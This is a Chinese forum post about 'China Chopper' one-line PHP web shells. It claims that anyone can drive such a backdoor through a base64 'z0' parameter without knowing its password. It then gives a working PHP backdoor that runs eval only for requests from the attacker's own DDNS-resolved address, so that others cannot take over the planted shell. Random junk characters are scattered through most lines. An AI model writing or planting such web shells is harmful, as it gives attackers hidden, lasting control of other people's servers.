今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
+ K( W; }% [ T. |3 O7 |& M
1 R% }! n) {1 @4 n! S' ~就算你设置了密码,使用了eval($_REQUEST['moyo']);. d' @6 k! n( A) H% ~
, S9 P- [6 W6 q8 J
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
3 ~4 a3 Z3 D, z! n! y3 C
5 @; d% R1 ?5 ~& i6 s* }因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));3 L6 Z& m- @4 n7 T1 k ?3 R
1 u0 M. Z, X% V) `) t! u直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了3 k1 |' [5 a. ?3 G# ~) ^
?: g. I/ Y5 @( K不知道是设计缺陷还是故意留的后门. @7 z# A- L8 ]( \$ x0 ^
% t2 u% ^! y5 d. \
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
1 \& M! v! A" a4 x# p* G# B
9 T1 i. L+ A* K2 c( S7 h9 Y$ F本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org' `- M# [/ a" E* E. Z
2 C2 N5 f4 n* X8 k然后一句话后门这样写, N( r* j# a# E) i; J4 i" n9 A
: X" O$ q- u* g7 B<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>1 L" |3 E) Q, S. O6 X
这样就可以让一句话后门只允许自己的电脑连接了
6 ?/ \* I# C1 Y7 T. D* @
: R6 n9 c: ~, H) h |